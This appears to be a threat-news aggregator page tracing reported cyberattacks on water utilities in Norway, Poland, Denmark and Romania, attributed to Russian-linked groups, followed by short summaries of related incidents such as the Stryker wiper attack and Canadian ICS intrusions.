CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Russian Actors Target Water Systems in Norway, Poland, Denmark, and Romania

First reported
Last updated
4 unique sources, 5 articles

Summary

Hide ▲

Russian and allied state-sponsored actors continue to target water systems across Europe as part of a broader hybrid campaign. In Poland, the Internal Security Agency (ABW) has documented cyberattacks against industrial control systems (ICS) at five water treatment plants in 2025, including Jabłonna Lacka, Szczytno, Małdyty, Tolkmicko, and Sierakowo. Attackers gained access to operational systems, modifying parameters with the potential to disrupt public water supplies. The campaign leverages weak password policies and internet-exposed systems, with attribution pointing to Russian APT groups APT28 and APT29, Belarusian-linked UNC1151, and other hacktivist personas acting as state proxies. Earlier incidents in Norway, Poland, and Denmark involved destructive or disruptive actions against water utilities, while Romania experienced a ransomware attack on its national water authority. These attacks form part of a sustained influence operation aimed at undermining Western support for Ukraine and demonstrating asymmetric cyber capabilities against critical infrastructure.

Timeline

  1. 22.12.2025 17:25 2 articles · 4mo ago

    Romanian Waters Hit by Ransomware Attack

    Romanian Waters, the country's water management authority, was hit by a ransomware attack where attackers used Windows BitLocker to encrypt approximately 1,000 systems across the national authority and 10 of 11 regional offices, leaving a 7-day ransom demand. The investigation remains ongoing and no attribution has been made.

    Show sources
    Open in new tab
  2. 19.12.2025 14:28 4 articles · 4mo ago

    Denmark Blames Russia for Cyberattacks on Water Utility

    Polish authorities report that in August 2025, a cyberattack could have caused a city to lose its water supply but was thwarted; the Internal Security Agency (ABW) later documented ICS breaches at five water treatment plants in 2025 (Jabłonna Lacka, Szczytno, Małdyty, Tolkmicko, and Sierakowo), where attackers gained access to operational systems and obtained the ability to modify equipment parameters, creating a direct risk to operational continuity and public water supply. ABW attributed primary responsibility to hacktivist groups often acting as state proxies, including Russian APT28, APT29, and Belarusian-linked UNC1151, and identified weak password policies and internet-exposed systems as primary attack vectors.

    Show sources
    Open in new tab
  3. 15.08.2025 16:00 3 articles · 8mo ago

    Russian Actors Target Water Systems in Norway and Poland

    On August 13, 2025, Norway's counter-intelligence agency attributed an April attack on a dam to Russian hackers, who opened a flood gate, releasing 500 liters of water per second for about four hours. The attack demonstrated the potential for water systems to be used as geopolitical pawns. Poland also reported a similar attack on a large city's water supply, which could have been shut down. In December 2025, Danish intelligence officials blamed Russia for orchestrating cyberattacks against Denmark's critical infrastructure, including a destructive attack on a water utility. Two Russian groups, Z-Pentest and NoName057(16), were identified as operating on behalf of the Russian state. The attacks are part of a broader influence campaign intended to undermine Western support for Ukraine.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Iranian Hacktivist Group Claims Wiper Attack on Stryker

The Iranian hacktivist group Handala—linked to Iran’s Ministry of Intelligence and Security (MOIS)—conducted a destructive wiper attack against Stryker, a U.S. Fortune 500 medical technology company, on March 11, 2026. The attack affected over 200,000 systems across 79 countries, disrupted operations in Ireland, and sent over 5,000 workers home. Handala claimed responsibility, citing retaliation for a U.S. missile strike. The attack leveraged Microsoft Intune to issue remote wipe commands and defaced Stryker’s Entra login page. Stryker confirmed the incident in an SEC filing and reported no evidence of data exfiltration. Recovery efforts prioritized restoring supply-chain systems. In a separate but related development, Handala breached the personal email account of FBI Director Kash Patel on March 28, 2026, and leaked historical emails from 2010 and 2019. The FBI acknowledged the targeting and stated the leaked data was not government-related. Handala operates under multiple monikers, including Banished Kitten and Void Manticore, and has integrated criminal tools such as Rhadamanthys stealer to enhance its operations. The group’s activities align with broader Iranian cyber operations targeting Western entities amid heightened geopolitical tensions, including destructive attacks, hack-and-leak campaigns, and psychological influence operations. U.S. authorities have seized multiple domains linked to Handala and offered a $10 million reward for information on group members.

Open in new tab

Increased ICS Vulnerability Exploits and Hacktivist Activity in 2025

In 2025, cyber threat actors, including both cybercriminals and hacktivists, significantly increased their attacks on industrial control systems (ICS) and operational technology (OT) environments. The number of ICS vulnerability disclosures nearly doubled compared to 2024, with Siemens and Schneider Electric being the most affected vendors. Ransomware attacks also surged, particularly targeting manufacturing and healthcare sectors, while hacktivist groups focused on energy, utilities, and transportation sectors. The report predicts continued targeting of exposed HMI and SCADA systems in 2026.

Open in new tab

Pro-Russia Hacktivists Target Critical Infrastructure with Low-Sophistication Attacks

Pro-Russia hacktivist groups are conducting opportunistic, low-sophistication cyberattacks against U.S., UK, and global critical infrastructure. These attacks target a wide range of sectors, including water treatment facilities, food production, energy systems, and local government bodies, using easily repeatable methods. The groups exploit minimally secured, internet-facing virtual network computing (VNC) connections to gain unauthorized access to operational technology (OT) control devices. The joint advisory from CISA, FBI, NSA, and global partners, along with a recent warning from the UK National Cyber Security Centre (NCSC), urges immediate action to mitigate these threats. The advisory highlights the use of basic methods to target supervisory control and data acquisition (SCADA) networks, sometimes combined with DDoS attacks. The cumulative impact of these activities poses a persistent and disruptive threat to essential services. According to a new report, groups such as Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), and Sector16 are using simple reconnaissance tools and common password-guessing techniques to reach internet-facing human-machine interfaces. These groups have led to physical impacts in some cases, including temporary loss of view and costly manual recovery efforts. The NCSC warns of continued malicious activity from Russian-aligned hacktivist groups targeting critical infrastructure and local government organizations in the UK with disruptive denial-of-service (DDoS) attacks. The NCSC notes that NoName057(16) operates the DDoSia project, a platform that allows volunteers to contribute computing resources to carry out crowdsourced DDoS attacks and receive monetary rewards or recognition from the community. Operation Eastwood disrupted NoName057(16)'s activity in mid-July 2025 by arresting two members of the group, issuing eight arrest warrants, and taking down 100 servers. Despite these efforts, the group has returned to action, highlighting the evolving threat they pose. Recent developments indicate that attackers are growing more interested in and accustomed to dealing with industrial machines, potentially leading to more sophisticated OT attacks. Ric Derbyshire, principal security engineer at Orange Cyberdefense, will demonstrate 'living-off-the-plant' attacks at the RSA Conference 2026, which require a holistic understanding of the physical process, OT systems, network architecture, security controls, and human interactions.

Open in new tab

INC Ransom Gang Disrupts OnSolve CodeRED Emergency Alert Platform

The INC Ransom gang has disrupted the OnSolve CodeRED emergency alert platform, stealing sensitive user data and forcing Crisis24 to decommission the legacy environment. The attack affected emergency notification systems used by state and local governments, police departments, and fire agencies across the United States. Data stolen includes names, addresses, email addresses, phone numbers, and passwords. The gang claims to have breached the system on November 1, 2025, and encrypted files on November 10, 2025. Crisis24 is rebuilding the service using backups from March 31, 2025, which may result in missing accounts. The incident highlights the critical impact of cyberattacks on emergency services and the importance of robust cybersecurity measures. The INC Ransom group has published screenshots of stolen data and is selling samples of the stolen data, escalating concerns among affected agencies. An operational security failure by the INC ransomware gang allowed researchers to recover data stolen from a dozen U.S. organizations. The investigation, conducted by Cyber Centaurs, revealed artifacts from the legitimate backup tool Restic, which exposed attacker infrastructure. The researchers developed a controlled enumeration process that confirmed the presence of encrypted data stolen from 12 unrelated organizations.

Open in new tab

Hacktivist Intrusions Target Canadian Water and Energy Facilities

Hacktivists have breached critical infrastructure systems in Canada, tampering with industrial controls at a water treatment facility, an oil & gas firm, and an agricultural facility. These incidents highlight the risks of poorly secured Industrial Control Systems (ICS) and the need for stronger security measures. The breaches resulted in degraded service, false alarms, and potentially unsafe conditions. The attacks were opportunistic and aimed at causing media attention and undermining trust in Canadian authorities. No catastrophic consequences were reported, but the incidents underscore the vulnerabilities in ICS components such as PLCs, SCADA systems, HMIs, and industrial IoTs.

Open in new tab